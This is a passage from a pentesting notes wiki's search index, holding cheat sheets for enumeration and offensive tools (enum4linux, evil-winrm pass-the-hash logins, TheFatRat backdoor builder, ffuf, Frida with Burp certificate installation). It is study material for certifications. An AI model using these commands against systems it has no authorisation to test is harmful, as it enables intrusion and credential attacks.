    ","tags":["post exploitation"]},{"location":"empire/#usage","title":"Usage","text":"","tags":["post exploitation"]},{"location":"enum/","title":"enum","text":"

    Enum is a console-based Win32 information enumeration utility. Using null sessions, enum can retrieve userlists, machine lists, sharelists, namelists, group and member lists, password and LSA policy information. enum is also capable of a rudimentary brute force dictionary attack on individual accounts.\u00a0

    ","tags":["windows","enumeration"]},{"location":"enum/#installation","title":"Installation","text":"

    Download it from: https://packetstormsecurity.com/search/?q=win32+enum&s=files.

    ","tags":["windows","enumeration"]},{"location":"enum/#basic-commands","title":"Basic commands","text":"
# Enumerate shares\nenum.exe -s $ip\n\n# Enumerate users\nenum.exe -u $ip\n\n# Display the password policy in case you need to mount a network authentication attack\nenum.exe -p $ip\n
    ","tags":["windows","enumeration"]},{"location":"enum4linux/","title":"enum4linux","text":"

enum4linux is a Perl script used to exploit null session attacks. The original tool was written in Perl by Mark Lowe and was later rewritten in Python (enum4linux-ng). Essentially it does something similar to winfo and enum.

    ","tags":["windows","enumeration"]},{"location":"enum4linux/#installation","title":"Installation","text":"

Preinstalled on Kali.

    ","tags":["windows","enumeration"]},{"location":"enum4linux/#basic-commands","title":"Basic commands","text":"
# Enumerate shares\nenum4linux -S $ip\n\n# Enumerate users\nenum4linux -U $ip\n\n# Enumerate machine list\nenum4linux -M $ip\n\n# Specify username to use (default \"\")\nenum4linux -u <username> $ip\n\n# Specify password to use (default \"\")\nenum4linux -p <password> $ip\n\n# Also you can use brute force by adding a file of share names\nenum4linux -s /usr/share/enum4linux/share-list.txt $ip\n\n# Do a nmblookup (similar to nbtstat)\nenum4linux -n $ip\n# In the result we see the <20> flag which means there are resources shared\n\n# Enumerate the password policy of the remote system. This is useful for brute force\nenum4linux -P $ip\n

    If you want to run all these commands in one line:

enum4linux -a $ip\n
    ","tags":["windows","enumeration"]},{"location":"evil-winrm/","title":"Evil-WinRm","text":"

    Evil-WinRM connects to a target using the Windows Remote Management service combined with the PowerShell Remoting Protocol to establish a PowerShell session with the target.

    By default, installed on kali. See winrm.

    ","tags":["tools","active directory","windows remote management"]},{"location":"evil-winrm/#basic-usage","title":"Basic usage","text":"

    Example from HTB machine: Responder.

evil-winrm -i $ip -u <username> -p <password>\n\nevil-winrm -i <ip> -u Administrator -H \"<passwordhash>\"\n# -H: Hash\n
    ","tags":["tools","active directory","windows remote management"]},{"location":"ewpt-preparation/","title":"eWPT Preparation","text":"Module Course (name and link) My notes on HackingLife 01 Introduction to Web application testing -HTTP and HTTPs- Phases of a web application security testing 02 Web Enumeration & Information Gathering Information gathering 03 WAPT: Web proxies and Web Information Gathering - BurpSuite- OWASP Zap 04 XSS Attacks - Cross Site Script vulnerabilities.- XSSer 05 SQL Injection Attacks - SQL injection: mysql, mssql, postgreSQL, mariadb, oracle database - NoSQL injection: sqlite, mongodb, redis - SQLi Cheat sheet for manual injection - Burpsuite Labs 06 Testing for common attacks - Testing HTTP Methods- Attacking basic and digest authentication, and OTP- Session management- Session fixation- Session highjacking- CSRF- Command injections- RCE attack - Remote Code Execution 07 File and Resource attacks - Arbitrary File Upload- Directory Traversal attack- Local File Inclusion (LFI)- Remote File Inclusion (RFI) 08 Web Service Security testing - Web services 09 CMS Security testing - Pentesting wordpress 10 Encoding, Filtering & Evasion - Data encoding- Input filtering

    eWPTX

Module Course name My notes on HackingLife 01 Encoding and filtering - Data encoding- Input filtering 02 Evasion Basics 03 Cross-Site Scripting - Cross Site Script vulnerabilities. 04 Filter evasion and WAF Bypassing 05 Cross-Site Request Forgery 06 HTML 5 07 SQL Injection 08 SQLi - Filter Evasion and WAF Bypassing 09 XML Attacks 10 Attacking Serialization 11 Server Side Attacks 12 Attacking Crypto 13 Attacking Authentication & SSO 14 Pentesting APIs & Cloud Applications 15 Attacking LDAP-based Implementations","tags":["course","certification","web pentesting"]},{"location":"exiftool/","title":"exiftool - A tool for metadata edition","text":"

    ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files. ExifTool supports many different metadata formats including EXIF, GPS, IPTC, XMP, JFIF, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP and ID3, Lyrics3, as well as the maker notes of many digital cameras by Canon, Casio, DJI, FLIR, FujiFilm, GE, GoPro, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Motorola, Nikon, Nintendo, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Phase One, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon and Sony.

    ExifTool can\u00a0Read,\u00a0Write and/or\u00a0Create files in the following formats. Also listed are the support levels for EXIF, IPTC (IIM), XMP, ICC_Profile, C2PA (JUMBF) and other metadata types for each file format. C2PA metadata is not currently\u00a0Writable, but may be\u00a0Deleted from some file types by deleting the JUMBF group (ie.\u00a0-JUMBF:all=).
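
For instance, a minimal sketch of deleting C2PA metadata by removing the JUMBF group (image.jpg is a placeholder file name):

exiftool -JUMBF:all= image.jpg\n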

    ","tags":["pentesting","file"]},{"location":"exiftool/#installation","title":"Installation","text":"

    Download from https://exiftool.org/index.html.

    ","tags":["pentesting","file"]},{"location":"exiftool/#basic-usage","title":"Basic usage","text":"
# Print common meta information for all images in \"dir\".  \"-common\" is a shortcut tag representing common EXIF meta information.\nexiftool -common dir\n\n# List specified meta information in tab-delimited column form for all images in \"dir\" to an output text file named \"out.txt\".\nexiftool -T -createdate -aperture -shutterspeed -iso dir > out.txt\n\n# Print ImageSize and ExposureTime tag names and values.\nexiftool -s -ImageSize -ExposureTime b.jpg\n\n# Print standard Canon information from two image files.\nexiftool -l -canon c.jpg d.jpg\n\n# Recursively extract common meta information from files in \"pictures\" directory, writing text output to \".txt\" files with the same names.\nexiftool -r -w .txt -common pictures\n\n# Save thumbnail image from \"image.jpg\" to a file called \"thumbnail.jpg\".\nexiftool -b -ThumbnailImage image.jpg > thumbnail.jpg\n\n# Recursively extract JPG image from all Nikon NEF files in the current directory, adding \"_JFR.JPG\" for the name of the output JPG files.\nexiftool -b -JpgFromRaw -w _JFR.JPG -ext NEF -r .\n\n# Extract all types of preview images (ThumbnailImage, PreviewImage, JpgFromRaw, etc.) from files in directory \"dir\", adding the tag name to the output preview image file names.\nexiftool -a -b -W %d%f_%t%-c.%s -preview:all dir\n\n# Print formatted date/time for all JPG files in the current directory.\nexiftool -d '%r %a, %B %e, %Y' -DateTimeOriginal -S -s -ext jpg .\n\n# Extract image resolution from EXIF IFD1 information (thumbnail image IFD)\nexiftool -IFD1:XResolution -IFD1:YResolution image.jpg\n\n# Extract all tags with names containing the word \"Resolution\" from an image.\nexiftool '-*resolution*' image.jpg\n\n# Extract all author-related XMP information from an image.\nexiftool -xmp:author:all -a image.jpg\n\n# Extract complete XMP data record intact from \"a.jpg\" and write it to \"out.xmp\" using the special \"XMP\" tag (see the Extra tags in Image::ExifTool::TagNames).\nexiftool -xmp -b a.jpg > out.xmp\n
    ","tags":["pentesting","file"]},{"location":"exiftool/#tag-names","title":"Tag names","text":"

    See table with all tag names: https://exiftool.org/TagNames/.

A Tag Name is the handle by which the information is accessed in ExifTool. Tag names are entered on the command line with a leading '-', in the order you want them displayed. Valid characters in a tag name are A-Z (case is not significant), 0-9, hyphen (-) and underline (_). The tag name may be prefixed by a group name (separated by a colon) to identify a specific information type or location. A special tag name of \"All\" may be used to represent all tags, or all tags in a specified group. For example, -All represents every tag, and -EXIF:All all tags in the EXIF group.
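
A couple of sketches of this syntax (image.jpg is a placeholder file name):

# Print all tags in the EXIF group\nexiftool -EXIF:All image.jpg\n\n# Print a single, group-prefixed tag\nexiftool -XMP:Creator image.jpg\n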

    ","tags":["pentesting","file"]},{"location":"exiftool/#tag-groups","title":"Tag groups","text":"

    See all info related to Tag groups

    ExifTool classifies tags into groups in various families. Here is a list of the group names in each family:

    Family Group Names 0 (Information\u00a0Type) AAC, AFCP, AIFF, APE, APP0, APP1, APP11, APP12, APP13, APP14, APP15, APP2, APP3, APP4, APP5, APP6, APP7, APP8, APP9, ASF, Audible, Canon, CanonVRD, Composite, DICOM, DNG, DV, DjVu, Ducky, EXE, EXIF, ExifTool, FITS, FLAC, FLIR, File, Flash, FlashPix, Font, FotoStation, GIF, GIMP, GeoTiff, GoPro, H264, HTML, ICC_Profile, ID3, IPTC, ISO, ITC, JFIF, JPEG, JSON, JUMBF, Jpeg2000, LNK, Leaf, Lytro, M2TS, MIE, MIFF, MISB, MNG, MOI, MPC, MPEG, MPF, MXF, MakerNotes, Matroska, Meta, Ogg, OpenEXR, Opus, PDF, PICT, PLIST, PNG, PSP, Palm, PanasonicRaw, Parrot, PhotoCD, PhotoMechanic, Photoshop, PostScript, PrintIM, QuickTime, RAF, RIFF, RSRC, RTF, Radiance, Rawzor, Real, Red, SVG, SigmaRaw, Sony, Stim, Theora, Torrent, Trailer, VCard, Vorbis, WTV, XML, XMP, ZIP 1\u00a0(Specific\u00a0Location) AAC, AC3, AFCP, AIFF, APE, ASF, AVI1, Adobe, AdobeCM, AdobeDNG, Apple, Audible, CBOR, CIFF, CameraIFD, Canon, CanonCustom, CanonDR4, CanonRaw, CanonVRD, Casio, Chapter#, Composite, DICOM, DJI, DNG, DV, DjVu, DjVu-Meta, Ducky, EPPIM, EXE, EXIF, ExifIFD, ExifTool, FITS, FLAC, FLIR, File, Flash, FlashPix, Font, FotoStation, FujiFilm, FujiIFD, GE, GIF, GIMP, GPS, GSpherical, Garmin, GeoTiff, GlobParamIFD, GoPro, GraphConv, H264, HP, HTC, HTML, HTML-dc, HTML-ncc, HTML-office, HTML-prod, HTML-vw96, HTTP-equiv, ICC-chrm, ICC-clrt, ICC-header, ICC-meas, ICC-meta, ICC-view, ICC_Profile, ICC_Profile#, ID3, ID3v1, ID3v1_Enh, ID3v2_2, ID3v2_3, ID3v2_4, IFD0, IFD1, IPTC, IPTC#, ISO, ITC, InfiRay, Insta360, InteropIFD, ItemList, JFIF, JFXX, JPEG, JPEG-HDR, JPS, JSON, JUMBF, JVC, Jpeg2000, KDC_IFD, Keys, Kodak, KodakBordersIFD, KodakEffectsIFD, KodakIFD, KyoceraRaw, LNK, Leaf, LeafSubIFD, Leica, Lyrics3, Lytro, M-RAW, M2TS, MAC, MIE-Audio, MIE-Camera, MIE-Canon, MIE-Doc, MIE-Extender, MIE-Flash, MIE-GPS, MIE-Geo, MIE-Image, MIE-Lens, MIE-Main, MIE-MakerNotes, MIE-Meta, MIE-Orient, MIE-Preview, MIE-Thumbnail, MIE-UTM, MIE-Unknown, MIE-Video, MIFF, MISB, MNG, MOBI, MOI, MPC, MPEG, MPF0, MPImage, MS-DOC, MXF, MacOS, MakerNotes, MakerUnknown, Matroska, MediaJukebox, Meta, MetaIFD, Microsoft, Minolta, MinoltaRaw, Motorola, NITF, Nikon, NikonCapture, NikonCustom, NikonScan, NikonSettings, NineEdits, Nintendo, Ocad, Ogg, Olympus, OpenEXR, Opus, PDF, PICT, PNG, PNG-cICP, PNG-pHYs, PSP, Palm, Panasonic, PanasonicRaw, Parrot, Pentax, PhaseOne, PhotoCD, PhotoMechanic, Photoshop, PictureInfo, PostScript, PreviewIFD, PrintIM, ProfileIFD, Qualcomm, QuickTime, RAF, RAF2, RIFF, RMETA, RSRC, RTF, Radiance, Rawzor, Real, Real-CONT, Real-MDPR, Real-PROP, Real-RA3, Real-RA4, Real-RA5, Real-RJMD, Reconyx, Red, Ricoh, SPIFF, SR2, SR2DataIFD, SR2SubIFD, SRF#, SVG, Samsung, Sanyo, Scalado, Sigma, SigmaRaw, Sony, SonyIDC, Stim, SubIFD, System, Theora, Torrent, Track#, UserData, VCalendar, VCard, VNote, Version0, Vorbis, WTV, XML, XMP, XMP-DICOM, XMP-Device, XMP-GAudio, XMP-GCamera, XMP-GCreations, XMP-GDepth, XMP-GFocus, XMP-GImage, XMP-GPano, XMP-GSpherical, XMP-LImage, XMP-MP, XMP-MP1, XMP-PixelLive, XMP-aas, XMP-acdsee, XMP-album, XMP-apple-fi, XMP-ast, XMP-aux, XMP-cc, XMP-cell, XMP-crd, XMP-creatorAtom, XMP-crs, XMP-dc, XMP-dex, XMP-digiKam, XMP-drone-dji, XMP-dwc, XMP-et, XMP-exif, XMP-exifEX, XMP-expressionmedia, XMP-extensis, XMP-fpv, XMP-getty, XMP-hdr, XMP-hdrgm, XMP-ics, XMP-iptcCore, XMP-iptcExt, XMP-lr, XMP-mediapro, XMP-microsoft, XMP-mwg-coll, XMP-mwg-kw, XMP-mwg-rs, XMP-nine, XMP-panorama, XMP-pdf, XMP-pdfx, XMP-photomech, XMP-photoshop, XMP-plus, XMP-pmi, XMP-prism, XMP-prl, XMP-prm, 
XMP-pur, XMP-rdf, XMP-sdc, XMP-swf, XMP-tiff, XMP-x, XMP-xmp, XMP-xmpBJ, XMP-xmpDM, XMP-xmpDSA, XMP-xmpMM, XMP-xmpNote, XMP-xmpPLUS, XMP-xmpRights, XMP-xmpTPg, ZIP, iTunes 2\u00a0(Category) Audio, Author, Camera, Device, Document, ExifTool, Image, Location, Other, Preview, Printing, Time, Unknown, Video 3\u00a0(Document\u00a0Number) Doc#, Main 4\u00a0(Instance\u00a0Number) Copy# 5\u00a0(Metadata\u00a0Path) eg. JPEG-APP1-IFD0-ExifIFD 6\u00a0(EXIF/TIFF\u00a0Format) int8u, string, int16u, int32u, rational64u, int8s, undef, int16s, int32s, rational64s, float, double, ifd, unicode, complex, int64u, int64s, ifd64 7\u00a0(Tag\u00a0ID) ID-xxx (where xxx is the tag ID. Numerical ID's are given in hex with a leading \"0x\" if the\u00a0HexTagIDs API option\u00a0is set, as are characters in non-numerical ID's which are not valid in a group name. Note that unlike other group names, family 7 group names are case sensitive.) 8\u00a0(File\u00a0Number) File# (for files loaded via\u00a0-file_NUM_\u00a0option)

The exiftool output can be organized based on these groups using the -g or -G option (i.e. -g1 to see family 1 groups, or -g3:1 to see both family 3 and family 1 group names in the output). See the -g option in the exiftool application documentation for more details, and the GetGroup function in the ExifTool library for a description of the group families. Note that when writing, only family 0, 1, 2 and 7 group names may be used.
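
For instance (image.jpg is a placeholder):

# Organize output by family 1 (specific location) group names\nexiftool -g1 image.jpg\n\n# Show both family 3 and family 1 group names\nexiftool -g3:1 image.jpg\n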

    ","tags":["pentesting","file"]},{"location":"eyewitness/","title":"EyeWitness","text":"

EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if known. It is designed to run on Kali Linux.

    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"eyewitness/#installation","title":"Installation","text":"

    Download from: https://github.com/FortyNorthSecurity/EyeWitness.

    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"eyewitness/#basic-usage","title":"Basic usage","text":"

First, create a file with the target domains, for instance listOfdomains.txt.

    Then, run:

    eyewitness --web -f listOfdomains.txt -d path/to/save/\n

After that you will get a report.html file with the requests and a screenshot of those domains. You will also have the index.html source code and the libraries in use.

    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"eyewitness/#proxing-the-request-via-burpsuite","title":"Proxing the request via BurpSuite","text":"
    eyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080\n
    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"fatrat/","title":"FatRat","text":"

TheFatRat is an exploitation tool which compiles malware with well-known payloads; the compiled malware can then be executed on Linux, Windows, Mac and Android. TheFatRat provides an easy way to create backdoors and payloads which can bypass most antivirus software.

    "},{"location":"fatrat/#installation","title":"Installation","text":"
    git clone https://github.com/screetsec/TheFatRat.git\ncd TheFatRat\nchmod +x fatrat setup.sh\nsudo ./setup.sh\n
    "},{"location":"fatrat/#basic-usage","title":"Basic usage","text":"
    # After launching it, browse the menu that fatrat has\ncd TheFatRat\nsudo fatrat\n
    "},{"location":"feroxbuster/","title":"feroxbuster - A web content enumeration tool for not referenced resources","text":"

    feroxbuster is used to perform forced browsing. Forced browsing allows us to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.

    Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories.

    ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"feroxbuster/#installation","title":"Installation","text":"

    See the repo: https://github.com/epi052/feroxbuster.

    sudo apt update && sudo apt install -y feroxbuster\n
    ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"feroxbuster/#dictionaries","title":"Dictionaries","text":"

The default wordlist and other settings are configured in /etc/feroxbuster/ferox-config.toml.
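
You can also override the wordlist per scan with -w; a sketch, assuming a seclists path like this one:

feroxbuster -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt\n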

    ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"feroxbuster/#basic-commands","title":"Basic commands","text":"
    # Include headers in the request\nferoxbuster -u http://127.1 -H Accept:application/json \"Authorization: Bearer {token}\"\n\n# Read urls from STDIN; pipe only resulting urls out to another tool\ncat targets | feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files\n\n# Proxy traffic through Burp\nferoxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080\n\n# Proxy traffic through a SOCKS proxy (including DNS lookups)\nferoxbuster -u http://127.1 --proxy socks5h://127.0.0.1:9050\n\n# Pass auth token via query parameter\nferoxbuster -u http://127.1 --query token=0123456789ABCDEF\n
    ","tags":["pentesting","web enumeration","tool","reconnaissance"]},{"location":"ffuf/","title":"ffuf - A fast web fuzzer written in Go","text":"","tags":["pentesting","web pentesting","enumeration"]},{"location":"ffuf/#installation","title":"Installation","text":"

    Download from: https://github.com/ffuf/ffuf

    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"ffuf/#basic-commands","title":"Basic commands","text":"
    ffuf -w /path/to/wordlist -u https://target/FUZZ\n\n####### Matchers options #######\n# -mc: Match HTTP status codes, or \"all\" for everything. (default: 200,204,301,302,307,401,403,405)\n# -ml: Match amount of lines in response\n# -mr: Match regexp\n# -ms: Match HTTP response size\n# -mw: Match amount of words in response\n\n####### Filters options #######\n# -fc: Filter HTTP status codes from response. Comma separated list of codes and ranges\n# -fl: Filter by amount of lines in response. Comma separated list of line counts and ranges\n# -fr: Filter regexp\n# -fs: Filter HTTP response size. Comma separated list of sizes and ranges\n# -fw: Filter by amount of words in response. Comma separated list of word counts and ranges\n\n# Virtual Host enumeration\n# use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\nffuf -w ./vhosts -u http://$ip -H \"HOST: FUZZ.example.com\" -fs 612\nffuf -w /path/to/vhost/wordlist -u https://$ip -H \"Host: FUZZ\" -fs 612\n# `-w`: Path to our wordlist\n# `-u`: URL we want to fuzz\n# `-H \"HOST: FUZZ.example.com\"`: This is the `HOST` Header, and the word `FUZZ` will be used as the fuzzing point.\n# `-fs 612`: Filter responses with a size of 612, default response size in this case.\n\n\n# Enumerating directories and folders:\nffuf -recursion -recursion-depth 1 -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt\n# -recursion: activates the recursive scan\n# -recursion-depth 1: specifies the maximum depth to scan\n\n# fuzz a combination of folder names, with a wordlist of possible files and a dictionary of extensions\nffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://$ip/FOLDERS/WORDLISTEXTENSIONS\n

By pressing ENTER during ffuf execution, the process is paused and the user is dropped into a shell-like interactive mode: there, filters can be reconfigured, the queue managed, and the current state saved to disk.

    ","tags":["pentesting","web pentesting","enumeration"]},{"location":"fierce/","title":"fierce - DNS scanner that helps locate non-contiguous IP space and hostnames","text":"

Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains. It's really meant as a precursor to nmap, OpenVAS, nikto, etc, since all of those require that you already know what IP space you are looking for. This does not perform exploitation and does not scan the whole internet indiscriminately. It is meant specifically to locate likely targets both inside and outside a corporate network. Because it uses DNS primarily you will often find mis-configured networks that leak internal address space. That's especially useful in targeted malware. Originally written by RSnake along with others at http://ha.ckers.org/.

# Perform a dns transfer using a wordlist against domain.com\nfierce -dns domain.com \n\n# Brute force subdomains with a seclist\nfierce --domain domain.com --subdomain-file fierce-hostlist.txt\n
    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"figlet/","title":"Figlet","text":"","tags":["tools"]},{"location":"figlet/#installation","title":"Installation","text":"
    sudo apt install figlet\n
    ","tags":["tools"]},{"location":"figlet/#basic-commands","title":"Basic commands","text":"
    # Show all fonts\nshowfigfonts\n\n# Usage\nfiglet -f banner \"lalala\"\n# -f font\n# banner is just a font\n# \"lalala\" the text that will be displayed\n\n\n#                                          \n#         ##   #        ##   #        ##   \n#        #  #  #       #  #  #       #  #  \n#       #    # #      #    # #      #    # \n#       ###### #      ###### #      ###### \n#       #    # #      #    # #      #    # \n####### #    # ###### #    # ###### #    # \n
    ","tags":["tools"]},{"location":"file-encryption/","title":"File encryption","text":"


    "},{"location":"file-encryption/#file-encryption","title":"File Encryption","text":""},{"location":"file-encryption/#windows","title":"Windows","text":""},{"location":"file-encryption/#invoke-aesencryptionps1-powershell-script","title":"Invoke-AESEncryption.ps1 PowerShell script","text":"

    Invoke-AESEncryption.ps1 PowerShell script

    After the script has been transferred, it only needs to be imported as a module, as shown below.

    PS C:\\htb> Import-Module .\\Invoke-AESEncryption.ps1\n

This command creates an encrypted file with the same name as the source file but with the extension \".aes\". Cheat sheet for encrypting and decrypting files:

############\n# ENCRYPTION\n############\n# Encrypts the string \"Secret Test\" and outputs a Base64 encoded ciphertext\nInvoke-AESEncryption -Mode Encrypt -Key \"p@ssw0rd\" -Text \"Secret Text\" \n\n# Encrypts the file \"file.bin\" and outputs an encrypted file \"file.bin.aes\"\nInvoke-AESEncryption -Mode Encrypt -Key \"p@ssw0rd\" -Path file.bin\n\n# Decrypts the file \"file.bin.aes\" and outputs a decrypted file \"file.bin\"\nInvoke-AESEncryption -Mode Decrypt -Key \"p@ssw0rd\" -Path file.bin.aes\n
    ############\n# DECRYPTION\n############\n# Decrypts the Base64 encoded string \"LtxcRelxrDLrDB9rBD6JrfX/czKjZ2CUJkrg++kAMfs=\" and outputs plain text.\nInvoke-AESEncryption -Mode Decrypt -Key \"p@ssw0rd\" -Text \"LtxcRelxrDLrDB9rBD6JrfX/czKjZ2CUJkrg++kAMfs=\"\n
    "},{"location":"file-encryption/#linux","title":"Linux","text":"

    See openssl

# Encrypt a file\nopenssl enc -aes-256-cbc -iter 100000 -pbkdf2 -in sourceFile.txt -out outputFile.txt.enc\n# -iter 100000: Optional. Override the default iteration count with this option.\n# -pbkdf2: Optional. Use the Password-Based Key Derivation Function 2 algorithm.\n\n# Decrypt a file\nopenssl enc -d -aes-256-cbc -iter 100000 -pbkdf2 -in encryptedFile.enc -out outputFile.txt\n\n# Generate private key\nopenssl genrsa -aes256 -out private.pem 2048\n\n# Generate public key\nopenssl rsa -in private.pem -outform PEM -pubout -out public.pem\n\n# Encrypt a file with the public key\nopenssl rsautl -encrypt -inkey public.pem -pubin -in file.txt -out file.enc\n# -pubin: the input key is a public key\n\n# Decrypt a file with the private key\nopenssl rsautl -decrypt -inkey private.pem -in file.enc -out file.txt\n
    "},{"location":"footprinting/","title":"01. Information Gathering / Footprinting","text":"","tags":["footprinting","CPTS","eWPT"]},{"location":"footprinting/#methodology","title":"Methodology","text":"Layer Description Information Categories 1. Internet Presence Identification of internet presence and externally accessible infrastructure. Domains, Subdomains, vHosts, ASN, Netblocks, IP Addresses, Cloud Instances, Security Measures 2. Gateway Identify the possible security measures to protect the company's external and internal infrastructure. Firewalls, DMZ, IPS/IDS, EDR, Proxies, NAC, Network Segmentation, VPN, Cloudflare 3. Accessible Services Identify accessible interfaces and services that are hosted externally or internally. Service Type, Functionality, Configuration, Port, Version, Interface 4. Processes Identify the internal processes, sources, and destinations associated with the services. PID, Processed Data, Tasks, Source, Destination 5. Privileges Identification of the internal permissions and privileges to the accessible services. Groups, Users, Permissions, Restrictions, Environment 6. OS Setup Identification of the internal components and systems setup. OS Type, Patch Level, Network config, OS Environment, Configuration files, sensitive private files","tags":["footprinting","CPTS","eWPT"]},{"location":"footprinting/#owasp-reference","title":"OWASP reference","text":"ID WSTG-ID Test Name Objectives Tools 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services). Google Hacking Shodan Recon-ng 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities. Wappalyzer Nikto 1.3 WSTG-INFO-03 Review Webserver Metafiles for Information Leakage - Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, tag, sitemap.xml) - Extract and map other information that could lead to a better understanding of the systems at hand. Browser Curl Burpsuite/ZAP 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers dnsrecon Nmap 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage. - Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist. Browser Curl Burpsuite/ZAP 1.6 WSTG-INFO-06 Identify Application Entry Points - Identify possible entry and injection points through request and response analysis which covers hidden fields, parameters, methods HTTP header analysis OWASP ASD Burpsuite/ZAP 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough Burpsuite/ZAP 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. 
- Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message. Whatweb Wappalyzer CMSMap 1.9 WSTG-INFO-09 Fingerprint Web Application N/A, This content has been merged into: WSTG-INFO-08 NA 1.10 WSTG-INFO-10 Map Application Architecture - Understand the architecture of the application and the technologies in use. - Identify application architecture whether on Application and Network components: Applicaton: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs Network and Security: Reverse proxy, IPS, WAF WAFW00F Nmap","tags":["footprinting","CPTS","eWPT"]},{"location":"fping/","title":"fping - An improved ping tool","text":"

    Linux tool which is an improved version of the ping utility:

    fping -a -g IPRANGE\n# -a: forces the tool to show only alive hosts.\n# -g: tells the tool we want to perform a ping sweep instead of a standard ping.\n

You can also use CIDR notation or an explicit address range:

    fping -a -g 10.54.12.0/24\nfping -a -g 10.54.12.0 10.54.12.255\n
    ","tags":["scanning","reconnaissance","ping"]},{"location":"frida/","title":"Frida - A dynamic instrumentation toolkit","text":"

    Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. It lets you inject snippets of JavaScript or your own library into native apps on Windows, macOS, GNU/Linux, iOS, watchOS, tvOS, Android, FreeBSD, and QNX. Frida also provides you with some simple tools built on top of the Frida API. These can be used as-is, tweaked to your needs, or serve as examples of how to use the API. More.

    ","tags":["mobile pentesting"]},{"location":"frida/#installation-and-set-up","title":"Installation and set up","text":"

    Download it:

    pip install frida-tools\npip install frida\nwget https://github.com/frida/frida/releases/download/15.1.14/frida-server-15.1.14-android-x86.xz\n

    Unzip the file with extension xz:

    unxz frida-server-15.1.14-android-x86.xz\n

    Make sure we're connected to the device:

    adb connect 192.168.156.103:5555\n

    Upload frida file to the device:

    adb push frida-server-15.1.14-android-x86 /data/local/tmp/frida-server\n

    We go to the path where we have stored the file:

adb shell\ncd /data/local/tmp\n

    We list contents, see frida-server file, and we change permissions:

    ls -la\nchmod 777 frida-server\n

    Now we can run the binary:

    ./frida-server\n

    From another terminal we can see processes running on the device:

frida-ps -U\n
    ","tags":["mobile pentesting"]},{"location":"frida/#install-burp-certificate-in-frida","title":"Install Burp Certificate in Frida","text":"

Our goal is to install it at /system/etc/security/cacerts. This is where Authority certificates are stored, and it's the place where we will install the Burp certificate.

    First, we open Burp > Proxy > Options > Proxy Listener and we click on \"Import / Export CA Certificate\". We save it in DER format to a folder accessible from kali. We can give it the name: cacert.der.

    Second, we convert der format to pem:

    openssl x509 -inform DER -in cacert.der -out cacert.pem\n

    Now, we extract the hash that we will use later on to name the certificate.

    openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1\n

    It returns (for instance): 9a5ba575.

Let's rename cacert.pem to that hash:

    mv cacert.pem 9a5ba575.0\n

    To act as root we'll run:

    adb root\n

And to remount the partitions:

    adb remount\n

Next step will be to upload the certificate 9a5ba575.0 to the SD card:

    adb push 9a5ba575.0 /sdcard/\n

    Let's go to that directory and move the file to our preferred location:

    adb shell\ncd /sdcard\nls -la\nmv 9a5ba575.0 /system/etc/security/cacerts\n

    Change permissions to the file:

chmod 644 /system/etc/security/cacerts/9a5ba575.0\n

In Burp we now need a proxy listener. Bind it to the Host-Only IP of our kali machine (for instance: 192.168.156.107), port 8080.

And in the wifi settings of the virtual device running on GenyMotion (for instance a Galaxy S6), we need to set that same kali Host-Only IP as the proxy.
    ","tags":["mobile pentesting"]},{"location":"frida/#basic-commands","title":"Basic commands","text":"
